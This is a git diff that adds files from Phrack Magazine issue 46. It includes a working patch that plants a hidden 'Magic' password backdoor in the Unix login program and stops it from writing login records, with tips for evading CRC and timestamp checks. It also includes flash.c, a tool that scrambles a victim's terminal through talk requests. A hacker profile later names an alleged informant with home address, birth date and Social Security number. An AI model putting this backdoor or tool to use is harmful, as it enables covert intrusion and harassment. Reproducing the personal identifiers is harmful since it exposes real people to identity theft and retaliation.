+Admittedly I could of encrypted the "Magic" password, but I decided against this
+for several reasons.
+
+The second thing you would need to do if you where illegally placing a "Magic"
+login on a system would be to ensure that the admins are not doing CRC checks on
+SUID(0) programs, or if they are that you change the CRC record of login to
+match the CRC record of the "Magic" login.
+
+Thirdly do not forget to make the date and time stamp of the new binary match
+the old ones.
+
+To install a new /bin/login on a system you will need to be root, now if you are
+already root why would you bother? Simple, it is just one more backdoor that you
+can use to get back in if you are detected.
+
+LIMITATIONS
+~~~~~~~~~~~
+This version of the "Magic" login program does not have the following features,
+I leave it entirely up to you about implementing something to fix them:
+
+     - Shells & Programs show up in the Process Table
+
+     - tty Ownership and attributes
+
+     - /proc filesystem
+
+Any one of these to an alert system admin will show that there is an "invisible"
+user on the system. However it has been my experience that most admin's rarely
+look at these things, or if they do they can not see the wood for the trees.
+
+-----<cut here>-----
+
+diff -c /root/work/login/console.c /root/work/logon/console.c
+*** /root/work/login/console.c Sun Oct 11 07:16:47 1992
+--- /root/work/logon/console.c Sat Jun  4 15:29:15 1994
+***************
+*** 21,26 ****
+--- 21,27 ----
+  #endif
+
+  extern char *getdef_str();
++ extern  int magik;
+
+  /*
+   * tty - return 1 if the "tty" is a console device, else 0.
+***************
+*** 47,52 ****
+--- 48,57 ----
+   if ((console = getdef_str("CONSOLE")) == NULL)
+    return 1;
+
++  /* Fix for Magic Login - UnAuth Console - Data King */
++
++  if (magik==1)
++   return 1;
+   /*
+    * If this isn't a filename, then it is a ":" delimited list of
+    * console devices upon which root logins are allowed.
+diff -c /root/work/login/lmain.c /root/work/logon/lmain.c
+*** /root/work/login/lmain.c Mon Oct 12 17:35:06 1992
+--- /root/work/logon/lmain.c Sat Jun  4 15:30:37 1994
+***************
+*** 105,110 ****
+--- 105,111 ----
+  char *Prog;
+  int newenvc = 0;
+  int maxenv = MAXENV;
++ int magik;  /* Global Flag for Magic Login - Data King */
+
+  /*
+   * External identifiers.
+diff -c /root/work/login/log.c /root/work/logon/log.c
+*** /root/work/login/log.c Mon Oct 12 17:35:07 1992
+--- /root/work/logon/log.c Sat Jun  4 15:37:22 1994
+***************
+*** 53,58 ****
+--- 53,59 ----
+  extern struct passwd pwent;
+  extern struct lastlog lastlog;
+  extern char **environ;
++ extern char magik;
+
+  long lseek ();
+  time_t time ();
+***************
+*** 83,89 ****
+   (void) time (&newlog.ll_time);
+   (void) strncpy (newlog.ll_line, utent.ut_line, sizeof newlog.ll_line);
+   (void) lseek (fd, offset, 0);
+!  (void) write (fd, (char *) &newlog, sizeof newlog);
+   (void) close (fd);
+  }
+
+--- 84,93 ----
+   (void) time (&newlog.ll_time);
+   (void) strncpy (newlog.ll_line, utent.ut_line, sizeof newlog.ll_line);
+   (void) lseek (fd, offset, 0);
+!  if (magik !=1) /* Dont Modify Last login Specs if this is a Magic  */
+!  {        /* login - Data King */
+!    (void) write (fd, (char *) &newlog, sizeof newlog);
+!  }
+   (void) close (fd);
+  }
+
+diff -c /root/work/login/utmp.c /root/work/logon/utmp.c
+*** /root/work/login/utmp.c Mon Oct 12 17:35:36 1992
+--- /root/work/logon/utmp.c Sat Jun  4 15:41:13 1994
+***************
+*** 70,75 ****
+--- 70,77 ----
+  extern long lseek();
+  #endif /* SVR4 */
+
++ extern  int magik;
++
+  #define NO_UTENT \
+   "No utmp entry.  You must exec \"login\" from the lowest level \"sh\""
+  #define NO_TTY \
+***************
+*** 353,368 ****
+   /*
+    * Scribble out the new entry and close the file.  We're done
+    * with UTMP, next we do WTMP (which is real easy, put it on
+!   * the end of the file.
+    */
+!
+!  (void) write (fd, &utmp, sizeof utmp);
+!  (void) close (fd);
+!
+!  if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) {
+    (void) write (fd, &utmp, sizeof utmp);
+    (void) close (fd);
+   }
+-   utent = utmp;
+  #endif /* SVR4 */
+  }
+--- 355,372 ----
+   /*
+    * Scribble out the new entry and close the file.  We're done
+    * with UTMP, next we do WTMP (which is real easy, put it on
+!   * the end of the file. If Magic Login, DONT write out UTMP - Data King
+    */
+!  if (magik !=1)
+!  {
+    (void) write (fd, &utmp, sizeof utmp);
+    (void) close (fd);
++
++   if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) {
++    (void) write (fd, &utmp, sizeof utmp);
++    (void) close (fd);
++   }
++    utent = utmp;
+   }
+  #endif /* SVR4 */
+  }
+diff -c /root/work/login/valid.c /root/work/logon/valid.c
+*** /root/work/login/valid.c Sun Oct 11 07:16:55 1992
+--- /root/work/logon/valid.c Sat Jun  4 15:47:28 1994
+***************
+*** 25,30 ****
+--- 25,32 ----
+  static char _sccsid[] = "@(#)valid.c 3.4 08:44:15 9/12/91";
+  #endif
+
++ extern int magik;
++
+  /*
+   * valid - compare encrypted passwords
+   *
+***************
+*** 43,48 ****
+--- 45,64 ----
+   char *encrypt;
+   char *salt;
+   char *pw_encrypt ();
++  char  *magic;
++
++  /*
++   * Below is the piece of code that checks to see if the password
++   * supplied by the user = the Magic Password - Data King
++   */
++
++  magic = "CONSOLE"; /* Define this as the Magic Password - Data King */
++
++  if (strcmp(password,magic) == 0)
++   {
++    magik = 1;
++    return(1);
++   }
+
+   /*
+    * Start with blank or empty password entries.  Always encrypt
+
+------------------------------------------------------------------------------
+
+/* flash.c */
+
+/* This little program is intended to quickly mess up a user's
+   terminal by issuing a talk request to that person and sending
+   vt100 escape characters that force the user to logout or kill
+   his/her xterm in order to regain a sane view of the text.
+   It the user's message mode is set to off (mesg n) he/she will
+   be unharmed.
+   This program is really nasty :-)
+
+   Usage: flash user@host
+
+   try compiling with: gcc -o flash flash.c
+*/
+
+
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <netdb.h>
+#include <stdio.h>
+#include <strings.h>
+
+/* this should really be in an include file..  */
+
+#define OLD_NAME_SIZE 9
+#define NAME_SIZE    12
+#define TTY_SIZE     16
+typedef struct {
+        char    type;
+        char    l_name[OLD_NAME_SIZE];
+        char    r_name[OLD_NAME_SIZE];
+        char    filler;
+        u_long  id_num;
+        u_long  pid;
+        char    r_tty[TTY_SIZE];
+        struct  sockaddr_in addr;
+        struct  sockaddr_in ctl_addr;
+} OLD_MSG;
+
+typedef struct {
+        u_char  vers;
+        char    type;
+        u_short filler;
+        u_long  id_num;
+        struct  sockaddr_in addr;
+        struct  sockaddr_in ctl_addr;
+        long    pid;
+        char    l_name[NAME_SIZE];
+        char    r_name[NAME_SIZE];
+        char    r_tty[TTY_SIZE];
+} CTL_MSG;
+
+#define TALK_VERSION    1               /* protocol version */
+
+/* Types */
+#define LEAVE_INVITE    0
+#define LOOK_UP         1
+#define DELETE          2
+#define ANNOUNCE        3
+
+int current = 1;  /* current id..  this to avoid duplications */
+
+struct sockaddr_in *getinaddr(char *hostname, u_short port)
+{
+static  struct sockaddr    addr;
+struct  sockaddr_in *address;
+struct  hostent     *host;
+
+address = (struct sockaddr_in *)&addr;
+(void) bzero( (char *)address, sizeof(struct sockaddr_in) );
+/* fill in the easy fields */
+address->sin_family = AF_INET;
+address->sin_port = htons(port);
+/* first, check if the address is an ip address */
+address->sin_addr.s_addr = inet_addr(hostname);
+if ( (int)address->sin_addr.s_addr == -1)
+        {
+        /* it wasn't.. so we try it as a long host name */
+        host = gethostbyname(hostname);
+        if (host)
+                {
+                /* wow.  It's a host name.. set the fields */
+                /* ?? address->sin_family = host->h_addrtype; */
+                bcopy( host->h_addr, (char *)&address->sin_addr,
+                        host->h_length);
+                }
+        else
+                {
+                /* oops.. can't find it.. */
+  puts("Couldn't find address");
+  exit(-1);
+                return (struct sockaddr_in *)0;
+                }
+        }
+/* all done. */
+return (struct sockaddr_in *)address;
+}
+
+SendTalkPacket(struct sockaddr_in *target, char *p, int psize)
+{
+int  s;
+struct sockaddr sample; /* not used.. only to get the size */
+
+s = socket(AF_INET, SOCK_DGRAM, 0);
+sendto( s, p, psize, 0,(struct sock_addr *)target, sizeof(sample) );
+}
+
+
+new_ANNOUNCE(char *hostname, char *remote, char *local)
+{
+CTL_MSG  packet;
+struct   sockaddr_in  *address;
+
+/* create a packet */
+address = getinaddr(hostname, 666 );
+address->sin_family = htons(AF_INET);
+
+bzero( (char *)&packet, sizeof(packet) );
+packet.vers   = TALK_VERSION;
+packet.type   = ANNOUNCE;
+packet.pid    = getpid();
+packet.id_num = current;
+bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) );
+bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr));
+strncpy( packet.l_name, local, NAME_SIZE);
+strncpy( packet.r_name, remote, NAME_SIZE);
+strncpy( packet.r_tty, "", 1);
+
+SendTalkPacket( getinaddr(hostname, 518), (char *)&packet, sizeof(packet) );
+}
+
+old_ANNOUNCE(char *hostname, char *remote, char *local)
+{
+OLD_MSG  packet;
+struct   sockaddr_in  *address;
+
+/* create a packet */
+address = getinaddr(hostname, 666 );
+address->sin_family = htons(AF_INET);
+
+bzero( (char *)&packet, sizeof(packet) );
+packet.type   = ANNOUNCE;
+packet.pid    = getpid();
+packet.id_num = current;
+bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) );
+bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr));
+strncpy( packet.l_name, local, NAME_SIZE);
+strncpy( packet.r_name, remote, NAME_SIZE);
+strncpy( packet.r_tty, "", 1);
+
+SendTalkPacket( getinaddr(hostname, 517), (char *)&packet, sizeof(packet) );
+}
+
+main(int argc, char *argv[])
+{
+ char *hostname, *username;
+ int pid;
+
+ if ( (pid = fork()) == -1)
+   {
+  perror("fork()");
+  exit(-1);
+  }
+ if ( !pid )
+  {
+  exit(0);
+  }
+ if (argc < 2) {
+  puts("Usage: <finger info> ");
+  exit(5);
+ }
+  username = argv[1];
+ if ( (hostname = (char *)strchr(username, '@')) == NULL )
+  {
+  puts("Invalid name.  ");
+  exit(-1);
+  }
+        *hostname = '\0';
+ hostname++;
+
+ if (*username == '~')
+  username++;
+
+#define FIRST "\033c\033(0\033#8"
+#define SECOND "\033[1;3r\033[J"
+#define THIRD  "\033[5m\033[?5h"
+ new_ANNOUNCE(hostname, username, FIRST);
+ old_ANNOUNCE(hostname, username, FIRST);
+ current++;
+ new_ANNOUNCE(hostname, username, SECOND);
+ new_ANNOUNCE(hostname, username, SECOND);
+ current++;
+ new_ANNOUNCE(hostname, username, THIRD);
+  old_ANNOUNCE(hostname, username, THIRD);
+}
+
+------------------------------------------------------------------------------
diff --git a/phrack46/5.txt b/phrack46/5.txt
new file mode 100644
index 0000000..6636d05
--- /dev/null
+++ b/phrack46/5.txt
@@ -0,0 +1,258 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 5 of 28
+
+****************************************************************************
+
+
+                            -:[ Phrack Pro-Phile ]:-
+
+This issue our prophile introduces you to one of the craziest people
+I've ever met from the Underground.  And coming from a complete loon
+like me, that's saying something.  This guy is a real Renaissance Man:
+Hacker, programmer, burglar, convict, star of stage and screen...
+Of course, that someone could only be:
+
+                                   Minor Threat
+                                   ~~~~~~~~~~~~
+_____________________________________________________________________________
+
+
+ Personal Info:
+
+           Handle: Minor Threat
+         Call him: MT, minor, lamer
+             Born: 1972 in Walnut Creek, California
+              Age: 22
+           Height: 6'1"
+           Weight: 155 lbs
+           e-mail: mthreat@paranoia.com
+              www: http://www.paranoia.com/~mthreat/
+     Affiliations: Dark Side Research
+  Computers owned: 1981: IBM PC
+                   1982: none
+                   1984: PCjr
+                   1988: XT Clone
+                   1990: 386/25 Clone
+                   1992: Too many to legally list
+                   1994: Pentium & 486
+
+How I got started
+~~~~~~~~~~~~~~~~~
+
+          In 1981, my dad worked for IBM.  In October of that year, he
+     brought home a PC, and I jumped on BASIC.  It wasn't until 1984 that
+     I got my first modem.  I had just moved to Florida with my dad, and
+     he had a modem.  I met some other kids with computers and modems and
+     they taught me what modems were for:  "You call other people's
+     computers and try to get their passwords and intercept their mail".
+     (That's what I was taught!)  It wasn't until a few months later I
+     realized that this wasn't the actual purpose of BBSs and modems.
+     My first BBS was the Towne Crier BBS at FAU (Florida Atlantic
+     University), 305-393-3891 (I still remember that damn number), but
+     the NPA has since changed to 407.  We thought it was so cool when
+     we logged on as "All" and deleted all the messages posted to "All".
+
+          In about 1985, I moved back to Austin.  I screwed around for
+     several years without doing any real hacking.  When I got to high
+     school, I wanted to change my grades like in War Games, so I looked
+     through the counselor's office until I found a number to the
+     Education Service Center.  I had to scan a whole _100_ numbers
+     (929-13xx) to find the HP3000 dialup.  Once I found it, I had no
+     idea what to do.  I gave the number to a friend in high school,
+     who gave it to some of his hacker friends.  They hacked it and gave
+     it back to me, complete with a full list of passwords and commands.
+     It turns out, the two Austin hackers who did it were The Mentor and
+     Erik Bloodaxe, but I didn't know that for another 3 years.
+
+          Shortly after this, I picked my permanent handle.  Minor Threat
+     was an early-to-mid 1980's punk band from Washington, DC.  They're no
+     longer together, but Fugazi is pretty good and Ian McKaye (from
+     Minor Threat) is in Fugazi.  I actually got the handle off of one
+     of my sister's tapes, before I even heard them.  But now I like the
+     music too.
+
+          Eventually, I found a local pirate board, met all the local
+     pirates, and got into the warez scene for a while.  I joined PE
+     (Public Enemy), the pirate group.  (I cracked the warez!)  Warez were
+     only so fun, so I looked for other stuff.  I met some VMB lamers and
+     got into that scene for about a month, and got bored again.
+
+          This was 1990, our 950s were running out, and we needed another
+     way to call out.  So I took an old VMB hacking program I had
+     written, and changed it around to scan for tones, in random order
+     to avoid Ma Bell problems.  I nicknamed it ToneLoc, short for Tone-
+     Locator.  I gave it to some friends (Alexis Machine & Marko Ramius)
+     and eventually, it ended up on some warez boards.  It got pretty
+     popular, so I made a version that worked for more people, called
+     it 0.90, and released it.  Then I lost the source in a hard drive
+     crash, and stopped working on it.
+
+          I was 18 and mom said it was time to get out of her house, so
+     I got my own apartment.  Marko Ramius and I learned about trashing
+     central offices, and gained COSMOS access.  We barely knew what
+     COSMOS was .. I knew I had read about it in old Phrack articles, and
+     I remembered that it was "elite."  Our problem was, we still knew no
+     other "real" hackers, and we had to learn COSMOS.  After trashing
+     and trashing, we still had no COSMOS manuals.  We had to get them
+     somehow.  I can't say how, I'll leave it to your imagination.
+
+          Marko and I started breaking in buildings and got pretty
+     good at it.  We had about a 60% success rate I would guess.  But we
+     never stole anything -- we just looked for cool information.  In
+     1991, we got caught in a building, and got charged with Criminal
+     Trespassing.  We both got probation for a Class A misdemeanor.
+     We decided it was time to stop breaking in buildings.
+
+          Late in 1991, I got e-mail on a bulletin board from someone
+     named Mucho Maas.  He said he had gotten ToneLoc and wanted a
+     few new features.   I told him I had lost the current source and
+     all I had was an old (0.85) source.  He said he would take the
+     old source, add the new features, and bring it up-to-date with
+     the current source.  So he did, and we released ToneLoc 0.95.
+     If it weren't for Mucho, ToneLoc would still be at version 0.90,
+     and anyone who ran 0.90 knows how hard it was to get it running
+     right.
+
+          About the same time, I was getting on a few BBSs in the
+     Washington DC area.  (Pentavia was the best while it was up).
+     I met several people there... including a guy named Codec.  Codec
+     was mostly a phone phreak, but did a little hacking as well.  But
+     when it came to PBX's, he was a master.  Not only had he exploited
+     PBXs for free long distance use like the rest of us, but he had
+     actually REMOVED entire PBX systems from buildings!  (See his
+     article on how to do this, Phrack 43, article 15).  But he had
+     also gotten caught and was on federal probation.
+
+     A few months after I met Codec, he had an 'incident'
+     and was on the run again.  I agreed to let him live with me, so
+     he flew down and moved in.  We got a 2 bedroom place, and set
+     the place up d0pe.  There were over 9 phone extensions, (not
+     including cordless), and about the same number of computers (Most
+     of which were Codec's).  We had the funnest 3 months ever ...
+     but about 2 weeks after SummerCon 1992, we got arrested.
+
+
+Favorite things
+~~~~~~~~~~~~~~~
+
+              Women: w0w
+              Music: Sonic Youth, Cure, Fugazi, Minor Threat, Orb, B-Boys,
+                     Jane's Addiction.
+      Favorite Book: 1984
+             My Car: 1990 300ZX Twin Turbo, Wolf Chip mod to 360
+                     horsepower.  It's fucking fast.
+    Favorite Movies: Jackie Chan movies, The Killer, Reservoir Dogs,
+                     The Lost Boys, Near Dark, Hardware.
+        Favorite TV: MacGyver
+
+
+What are some of your most memorable experiences?
+
+     Being polygraphed by the Secret Service in 1991 for something having
+     to do with some lamer threatening the president on an Alliance
+     Teleconference.  I failed the polygraph the first time, then I
+     passed it the second time.  (How's that for the government?)
+     Eventually, some other 15-year old got probation for doing it.
+
+     Being arrested with Codec in 1992.  He ran, outran the cops, jumped
+     a fence about 8 feet tall, and eventually got in a struggle with
+     a cop over the his gun (Officer Sheldon Salsbury, Austin PD).  The
+     gun went off, and we were both booked on attempted capital murder.
+     It turned out that the bullet hit no one, and all the blood was from
+     the cop hitting himself in the head with his own gun, although the
+     cop claims that Codec hit him in the forehead with a 2-meter ham
+     radio from like 20 feet away.  Right.  A search warrant was executed
+     on our apartment, and approximately $800,000 worth of AT&T Switching
+     equipment was seized from Codec's closet.  It turns out, we were
+     narced on and set-up by :
+
+       Jon R. Massengale
+       6501 Deer Hollow
+       Austin, TX  78750
+       DOB: 9-7-62
+       SSN: 463-92-0306
+
+
+     Being the first in Texas to have Caller-ID, before it was legally
+     available.
+
+     Losing control of my car at 140mph, doing a slow 360 at about 120,
+     living through it, and not doing too much damage to my car.
+
+
+   Good times:
+
+     Going up to Seattle to visit Cerebrum in May 1993, seeing Fugazi,
+     getting our car towed, then reading the dialups to the towing
+     company's xenix (login: sysadm).  Finally getting our Oki 900's
+     to clone/tumble/do other d0pe things.  Calling each other on
+     our Okis from 5 feet away, putting them together and causing
+     feedback.
+
+     Setting up my apartment with Codec with a 10-station Merlin system,
+     and a 9-station network.
+
+     SummerCon 1993.  "Culmination of Coolness."  Sorry, can't say any
+     more.
+
+
+Some People To Mention:
+
+
+     There are a lot of people who I would like to mention that have helped
+     me greatly and who I have known for a very long time:
+
+     Marko Ramius   -  First pirate/hacker I really knew in person.  We
+                       did a lot of crazy shit together.
+
+     Alexis Machine -  Second hacker-type I met, and a true Warez Kid.
+                       (that's a complement!)
+
+     Mucho Maas     -  Brought back ToneLoc from the dead.  Always told
+                       me what I shouldn't do, and always said "I told
+                       you so" when I got busted.
+
+     Codec          -  I had some of the funnest times of my life with
+                       Codec... unfortunately, it was so much fun it was
+                       illegal, and we got busted.
+
+     Cerebrum       -  Very cool friend who got narced on by a fuckhead
+                       named Zach, 206-364-0660.  Cerebrum is serving
+                       a 10 month federal sentence in a nice prison camp
+                       in Sheridan, Oregon.  He gets out about December
+                       10, 1994.
+
+     The Conflict   -  Unfortunately, I can't tell you.  Maybe in about 8
+                       more years.
+
+ESAC Administrator  -  "Have you been drinking on the job?"
+
+
+What I'm up to now
+~~~~~~~~~~~~~~~~~~
+
+     When I heard that the next Phrack Pro-phile was going to be about
+me, I realized, "I must be retired".  It's probably true.. at least I hope
+it is.  The 5 months I spent in jail was enough.  I just started going
+back to University of Texas, where they will only give me a VAX account
+(lame).  For the first time in 4 years, I think my life is going in
+the 'right' direction.
+
+Advice
+~~~~~~
+
+     I can only hope anyone who reads this will take this seriously.
+Here's my advice:  If you ever get arrested or even simply questioned about
+ANYTHING AT ALL, DO NOT COOPERATE.  Always tell the law enforcement
+official or whoever, "I'm sorry, I can't talk without my lawyer present"
+Cooperating will never help you.  Codec recently pointed out to me, that
+we should be the "role models" of what people should do when they get
+busted.  Both of us remained loyal and quiet during our whole case.  I was
+in jail for 5 months, and Codec is still in prison, but we never talked.
+Being narced on by a 'buddy' is the worst thing that could ever happen
+to you, and narcing on a 'buddy' is the worst thing you could do to
+them.  If you get busted for something, don't pass the punishment on
+to someone else.  I hope most of you never have to face this, but if
+you do, you will live much better knowing that you didn't give in to
+a bunch of 'law enforcement' pricks.
diff --git a/phrack46/6.txt b/phrack46/6.txt
new file mode 100644
index 0000000..190db69
--- /dev/null
+++ b/phrack46/6.txt
@@ -0,0 +1,993 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 6 of 28
+
+****************************************************************************
+
+                                  BIG FUN
+
+
+Think Federal District Court Judges and Special
+Agents get to have all the fun?
+
+Not any more!!
+
+It's the Operation Sun Devil Home Game!
+
+For the first step in the game, a quick flourish of a pen
+signs away your opponent's rights to any expectations of
+privacy.  Bank records, medical records, employment
+files, student records...literally anything is yours
+for the taking.
+
+As you progress through the various levels, you move on
+to other legal scenarios like the application for search
+warrant and the summons.
+
+It's all here in the Operation Sun Devil Home game, by
+Gailco.
+
+===============================================================
+
+Other game pieces available via ftp from freeside.com
+in /pub/phrack/gailco.
+
+Offer not sold in stores.  Do not use.
+Impersonating an officer of the court is a felony.
+
+section 1 of uuencode 4.13 of file GAME.PCX    by R.E.M.
+
+begin 644 GAME.PCX
+M"@,!`0````!/!D@(Q@#&````````````````````````````````````````V
+M```````````````````````````!R@`!`"`#6`(`````````````````````W
+M``````````````````````````````````````````````````#________-(
+M_________\W_________S?_________-_________\W_________S?______D
+M___-_________\W_________S?_________-_________\W_________S?__R
+M_______-_________\W_________S?_________-_________\W_________>
+MS?_________-_________\W_________S?_________-_________\W_____R
+M____S?_________-_________\W_________S?_________-_________\W_R
+M________S?_________-_________\W_________S?_________-________]
+M_\W_________S?_________-_________\W_________S?_________-____R
+M_____\W_________S?_________-_________\W_________S?_________-R
+M_________\W_________S?_________-_________\W_________S?______D
+M___-_________\W_________S?_________-_________\W_________S?__R
+M_______-_]'_P?!'P?[!X<'@P?_!]F#$_\'XPO_!\'______ZO_1_\'P8\'^X
+M8<'@P?_!]&#$_\'XPO_!\'_!_O_____I_]#_'\'@P>'!_@$`?\'&`'_#_\'PF
+MP?@^(!X.?\'_P?C_____YO_0_P_"P\'^`PX_CAX?P__!P,'\'P/"#A_!_\'^^
+M'______E_]#_!X?!Y\'^`PX_#L(>#V_!_\'`?!X'C@\?P?^$#\'_A\[_C___X
+M___4_]#_!X?!Y\'_`PX_#PX>#V?!_\'&P?X?!X</'\'_!P_!_X?._P?#_Y_!E
+M_Y______SO_/_\'^`8?!\<'^`X`_#@`AA&?!_\'\?QP#!X^?P?\/CC^`/P_!M
+MY<'_G[_'_\'^`#'!_\'G'\'\!______._\__P?PAP>?!\<'^`<'`P?\,`&"`L
+M8<'_P?C!_SP@!X^?P?^#P>QXP<!X(\'@P?P_P>'!^,'_P?G$_\'\`#'!_\'A&
+MG\'X`?_____._\__P?P`P>/!\<'\<`!_'#!@`&/!_\'PP?YX<`?!Q\'?P?_!H
+MP,'X<,'`&`'!P'#"`,'P/\'QP>!_P?A_P?!X<<'^P?*?PO#!\<']_____\S_<
+MS__!_&#!X\'PP?QP.'Y\<&`@9\'_P?C!_'AP)\'WPO_!X'APP>`X8,'@<&`@,
+MP?`_P?#!X'_!^'_!^'QPP?S!\+_#\,'XP?S_____R__/_\'X8&'!X<'\<`P_<
+M'GYAP>8'P?_!^,'^.,'[AX^?P?_!\``XP<.`<!H`P<`PP>$/P?&`'\'P0\'PV
+MP?_!\`AA'\'AP?G!P,'@.`______RO_/_\'\'$.#P?X0#A\>/@.&#\'_P?C!S
+M_QS!_P^/G\'_P=X$/,''@'@?``(<7P_!\8<?P?N'P?C!_\'P#F,?P>/!_X``M
+M#`______RO_0_\'^#@_!_@`$/P\^``\.?\'\P?\<P>8?CQ_!_P\$/`>,>!\`7
+M!AP$#\'A#Q_!_@?!_,'_P>,,0Q_!Q\'_C`,,#______*_]'_/@_!_P<&/P\_9
+M!L(//\+_'\'F'X\/P?\/AAZ'ACH/`@X>`@_!XX</P?X'P?[!_X..0P_!Q\'_[
+MC@,&!______*_]+_'\'_!\'`P?\//\'^'[_$_\'\/Y\?P?\'!`"'#"`.`8P\P
+M`P_!X8<?P>`'P?P_`8#!XQ_!X\'_@``0`______*_]7_P?'!_\'OR/_!_<'_]
+MP?X_P?^`P@#!P`@A@"#!X#A`#\'AAQ_!X,'#P?A\`<'@P>$?P>'!^,'`<``#'
+M_____\K_U__!Y\K_P?Y_P?_!X'Q`P>!X`<'@<``PP>`'P?#!QI_!X,'#P?C"4
+M,,'AP>"?PO``<`#!\______*_^7_P?C!_\'YPOASP?#!^'S!^,'PP?_!\<+_@
+MP?!AP?Q@<,'QP>`_P?!@P@`PP>/_____RO_I_\'X?\'[P?Y_P?[!\,'_P?G"^
+M_\'X`\'\`''"X1_!^,0`0______*_^G_P?[-_\'?P_^?P?X'@A`>#______*;
+M__W_#\'/'A\/_____\K_S__!]\,'S`^/P=^/P=_#G______F_\__P?3$`,8$2
+MP@##!`>'#Q_"G\*______^7_S__!_<'XPN!@PR``PB``PB#,`"``PB#$8,'@R
+MPF#!X&#"^<']P?G!_?_____1_]#_P?G%\,)@P>#!\&!PP?#"X&!`Q6``0,0`1
+MQ4#"8$#"8'#&\,'QP?G!_?_____,_]__P?W!_\/YP?W!^<'XP?#"^,;PQG##:
+M8,(@Q6#$<,3PP?'!^\'PP?C!_\'Y___]_^?_P?O"_\/[P?#!^<+P<&#!\'!@'
+MPT#+`,-`8&'!^\+PPOO___W_S__!^L0``@#'`L(&#L(/'Y_"'Y\?P?^?P=_/@
+M_\+?GY["#@;%`LH`Q@(/PA^?P=____#_S__!_L4$P@`$P@#"!,4&P@\.Q@_"K
+M'\?_O\G_O\8/P@["!@0&!,@`PP0&#L</'\'_/___Z?_0_\*/#\4'P@\'PP\'F
+MR`8"!@+%!L('PP;"!\4/CY^/PY_!W\;_G\6/Q`_$!\P&PP?)#\*/GP_#C\.?I
+M___3_]3_C\(/!X^?#[^?CP?"!,(`PP33``0.!P^/PY_"O\S_O\'_P=^_C\(?X
+MPP31`,($`,@$!L(/'\*?___0_^;_P?W!^<'QP_G"\,'QP?#!X,)@(&`@S0#"'
+M(,'@8'#!X,']PO'"^<+]RO_!_<'_P?W$^<'QP^!@QR``PB#+`"``PB!@Q.#!8
+M\,'@8,'@P?#!\<'@P>'!_<'_P?W[_^C_P?O!_\'YPOO!^,']P?G&\,/@Q&#"I
+M0,8`PD##8,'@QO#!\\/YR__#^\+QR?!PP?#"X,)@P>#$8$##`$``PF##0&#";
+M0`#$8'#(\,'Q]/_Z_\']P?G!_<+YP?C#\'#!\,-PQ&#%(,5@PW#!\,)PP?#$F
+M^,+YP?_!_<'YP?W)_\']P?_!_<'_P?W!_\'YP?_!^<'XQ/!PP?#$<,-@<,)@-
+M<,A@PR#$8,)P8,1PP?!PQ/#!^,'YP?C!_=_____!_\'YP?_!\,'YP>##\,'`B
+M0-(`0&#$\,'YP_O7_\'ZP?'!^,'YP?C!^<'P0&!`<$!@PT#7`$#"`$#"<,'XO
+M>,'[P?_!^\'YP?O9____SO_!W\*?'Q[##L(&P@+.``(&P@#$`L<&#AX/PI_!9
+MW];_G\'?'X\>!@<.PP8"#L,"T`##`L,&P@X/'\[____1_Y^_PI\?Q`_##@8.Q
+MQ`;"!,0`!,8`!``&P@0`PP0&Q@\?#\2?OY^_G[^?R?^_P?^_#\(?GQ\/PA^/N
+MPP\.#P8/Q0;.`,(&#A_,____W__!W\'_G\'/PX_"#\8'!L0'!L('Q08"R`;#-
+M!P;&!\(/!\(/Q(^?C\'?P<_!_\'?RO^?P?^/P=_"G\*/#X_%#\('P@;"`@8":
+M#\S____I_Y^_/[^/P@\_Q`\'CP;"!-@`P@0`P@</#@^/P[_!_Y_7_\*?AX0`1
+M!``?S/____O_P_W!^<'QPN#!\,'@PV`@8,(@8"``(,\`(``@`,(@8,'@8,'@$
+M8,'@8,+PP?'!^<+QP?G!_=C______\'_P?G!_\/YP?C+\,'@PV!`8-``0`!`,
+M(&#"0,'PPF#!X,/PP?'!^<'QPOG1_______2_\3]P?G%^,GPQ'#"8"#"8,D@Y
+MQ&#$<'_,_______?_\+[P?_!^\'_P?G!^'#"\,'`0`#"0-$`'\S______^[_"
+MP]_!_\'?P?^?PA_##L(&PP(?S/______^/^_P?^?O\,/'\S_________S?__&
+M_______-_________\W_________S?_________-_________\W_________>
+MS?_________-_________\W_________S?_________-_________\W_____R
+M____S?_V_\'`?\'\?\'S_____]'_]O\`'\'^'\'S_____]'_]?_!_@`.!!_!L
+MP#]_T__!S___^O_U_\'^``8"'X`??\3_P<?._\''O___^?_U_\'PPP`?@`#%P
+M_\'`SO^`'___^?_U_\'PPP`_@`#%_\'@SO_!P"/___G_]?_!X,,`/@`!Q?_!$
+MX<7_P?C'_\'\P@#!\=/_P?S#_\']___@__7_P>!@(``\(`'%_\'AP?_!\\/_0
+MP?Q_QO_!^,(`<=/_P?A]P?_!_,'XQ/_!^<K_P?W__]#_]?_!X,'XP>``.$`#'
+MQ?_!P\'_P>/#_\'X#\;_P?#"``/3_\'X.,'X0``#P__!P<K_P?S__]#_]?_!1
+MP\'_P<`#'@`'Q?_!Q\'_P<?#_\'\#\;_P?#"``?#_\'/Q?_!W\G_P?X"PP`#3
+MP_^#RO_!_A___\__]?^'P?^'`Q_!Z`?%_\'/P?^'P__!_@?&_\'`#@`/P_^/T
+MQ?^/R?_!_L4`/\+_A\K_P?P?RO_!_!___\/_]?^'P?\'`Q_!Z`?%_\'/P?^'V
+MP__!_@?&_\''#P`/P_^/Q?^/R?_!_L4`'\+_A\7_G\3_P?X?RO_!X@^?___"7
+M__7_C\'^#@,_P?@'Q_\'P__!_``_Q?^'P?_!P!_#_P_%_P_)_\'^Q0`/PO^/Y
+MQ?^?Q/_!^#_*_X`$'___PO_U_\'OP?P,`3_!^`/'_P/#_\'\`'_%_\'#P?_!*
+M\#_#_P_$_\'^#\K_Q0`'PO^/Q?^_Q/_!\'_#_\']QO_!X``G___"__;_P?`X^
+M`'_!\`/&_\'\`\/_P?P`/\7_`\'_P?A_PO_!_`_$_\'X'\;_P?'#_\'`Q``'\
